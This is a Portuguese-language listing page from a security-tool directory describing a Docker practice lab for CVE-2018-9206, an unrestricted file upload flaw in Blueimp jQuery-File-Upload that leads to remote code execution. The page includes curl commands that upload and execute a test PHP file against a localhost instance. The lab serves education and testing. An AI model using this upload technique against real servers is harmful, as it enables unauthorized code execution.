Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

Ambiente de laboratório baseado em Docker para CVE-2018-9206 (Blueimp jQuery-File-Upload, upload de arquivo irrestrito para RCE) com scripts PoC e comandos de validação.

Ver Repositório
11há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-9206 - Laboratório Blueimp jQuery-File-Upload

Ambiente Docker vulnerável para CVE-2018-9206 - Upload de Arquivo Irrestrito no Blueimp jQuery-File-Upload <= 9.22.0.

Início rápido

root@kitploit:~
docker compose up -d --build

Aplicação disponível em: http://localhost:8888/jQuery-File-Upload/

Validar

root@kitploit:~
# Upload de um arquivo PHP
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Executar
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Saída: CVE-2018-9206-PWNED

Ou execute o script PoC:

root@kitploit:~
./scripts/poc.sh

Limpeza

root@kitploit:~
docker compose down -v

Detalhes

CampoValor
CVECVE-2018-9206
ProdutoBlueimp jQuery-File-Upload
Versão9.22.0
TipoUpload de Arquivo Irrestrito → RCE
CVSS9.8 (Crítico)

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Baixar ferramenta